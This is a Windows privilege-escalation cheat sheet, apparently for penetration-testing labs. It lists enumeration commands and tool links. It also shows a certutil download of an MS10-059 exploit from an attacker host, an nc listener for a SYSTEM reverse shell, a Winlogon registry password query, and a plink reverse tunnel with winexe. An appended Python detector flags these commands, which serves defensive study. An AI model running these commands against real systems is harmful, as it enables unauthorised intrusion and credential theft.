# Windows Privilege Escalation

###### tags: `windows` `priv esc`

- [Fuzzy Security reference](https://fuzzysecurity.com/tutorials/16.html)
- [Windows Priv Esc Guide -abs](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
- [Priv Esc Windows Guide -sushant](https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html)
- [Payload all the things](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-escalation/)

```
# to get system info use:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

# to check patching levels use:
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn

# to list drives use:
wmic logicaldisk get caption,description,providername

# show current user
whoami

# show current privileges
whoami /priv

# show groups for current user
whoami /groups

# show users on the machine
net user

# show info for user x
net user x

# show info for group x
net localgroup x

# show arp table
arp -a

# show routing table
route print

# network statistics (with owning PIDs)
netstat -ano

# see defender status (sc is service control)
sc query windefend

# see all services running
sc queryex type= service

# see state of fw through either of these two commands
netsh firewall show state
netsh advfirewall firewall dump

# see config
netsh firewall show config
```

## Automated Tools Overview

- WinPEAS - https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
- Windows PrivEsc Checklist - https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation
- Sherlock - https://github.com/rasta-mouse/Sherlock
- Watson - https://github.com/rasta-mouse/Watson
- PowerUp - https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
- JAWS - https://github.com/411Hall/JAWS
- Windows Exploit Suggester - https://github.com/AonCyberLabs/Windows-Exploit-Suggester
- Metasploit Local Exploit Suggester - https://blog.rapid7.com/2015/08/11/metasploit-local-exploit-suggester-do-less-get-more/
- Seatbelt - https://github.com/GhostPack/Seatbelt
- SharpUp - https://github.com/GhostPack/SharpUp

To install pip in case you don't have it: `curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py; python get-pip.py`

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits

## Manual Exploitation

We can compile the exploit, then set up a web server with Python for the victim machine to reach out to and download the file.

```=1
# set up the server on port 80 (so the certutil URL below needs no port)
python -m SimpleHTTPServer 80
# or, with python3
python3 -m http.server 80

# on the victim, fetch the file from the webserver
certutil -urlcache -f http://ip/filename localName
# e.g.
certutil -urlcache -f http://10.10.14.4/MS10-059.exe ms.exe
```

We then set up a listener for the victim to connect back to:

```=1
# set up a listener on the attacker machine
nc -nlvp 5555

# run the exploit on the victim
ms.exe ip port
# e.g.
ms.exe 10.10.14.4 5555
# pops a shell as NT AUTHORITY\SYSTEM
```

MS10-059 Exploit - https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

### Password abuse

```=1
# once we have a shell we can run the command below to look for default passwords stored in the registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# for machines where a port is only available internally, we can forward that port if we have a low level shell
# we can forward the traffic using plink.exe, which can be downloaded from the PuTTY download page
# before using plink, edit /etc/ssh/sshd_config on the attacker machine and set "PermitRootLogin yes" so the root login below is accepted
# the command syntax is:
# plink.exe -l SuperUser -pw Passwd -R attackerPort:127.0.0.1:internalPort attackerIP
plink.exe -l root -pw rootPass -R 445:127.0.0.1:445 10.10.14.4

# we can pop an admin shell with the command below over the previously forwarded port
winexe -U Administrator%Passwd //127.0.0.1 "cmd.exe"
```

Plink Download - https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html

### Stabilizing a shell

[TTY shell escape](https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell)
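As an added defender-side example (not from this cheat sheet or any of the linked tools): a small Python scan that flags the certutil download, plink reverse forward and Winlogon registry query from the sections above when they show up in process-creation command lines, such as the CommandLine field of Windows 4688 or Sysmon event 1 records. The rule names and the sample command lines are constructed for illustration.

```python
"""Added example: flag the cheat-sheet commands in process-creation logs."""
import re

# Each rule is (name, regex over the command line). Patterns are constructed
# here from the commands in the sections above, not taken from any product.
RULES = [
    # certutil used as a downloader: -urlcache plus an http(s) URL
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s+.*-urlcache\b.*\bhttps?://", re.I)),
    # plink opening a reverse tunnel (-R <port>:...) back to another host
    ("plink_reverse_forward",
     re.compile(r"plink(\.exe)?\s+.*\s-R\s+\d+:", re.I)),
    # reg query against the Winlogon key that can hold stored credentials
    # (noisy: legitimate admin tooling reads this key too, so tune per estate)
    ("winlogon_cred_query",
     re.compile(r"reg(\.exe)?\s+query\s+.*\\Winlogon", re.I)),
]


def classify(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines):
    """Return (line_number, command_line, matched_rules) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        matches = classify(line)
        if matches:
            hits.append((n, line, matches))
    return hits


# Constructed sample CommandLine values, mixing the cheat-sheet commands
# with benign look-alikes so the rules can be checked for false positives.
SAMPLE_CMDLINES = [
    r'certutil -urlcache -f http://10.10.14.4/MS10-059.exe ms.exe',
    r'certutil -hashfile C:\Windows\notepad.exe SHA256',   # benign use
    r'plink.exe -l root -pw rootPass -R 445:127.0.0.1:445 10.10.14.4',
    r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"',
    r'whoami /priv',                                        # not covered
]

if __name__ == "__main__":
    for n, line, rules in scan(SAMPLE_CMDLINES):
        print(f"line {n}: {', '.join(rules)} :: {line}")
```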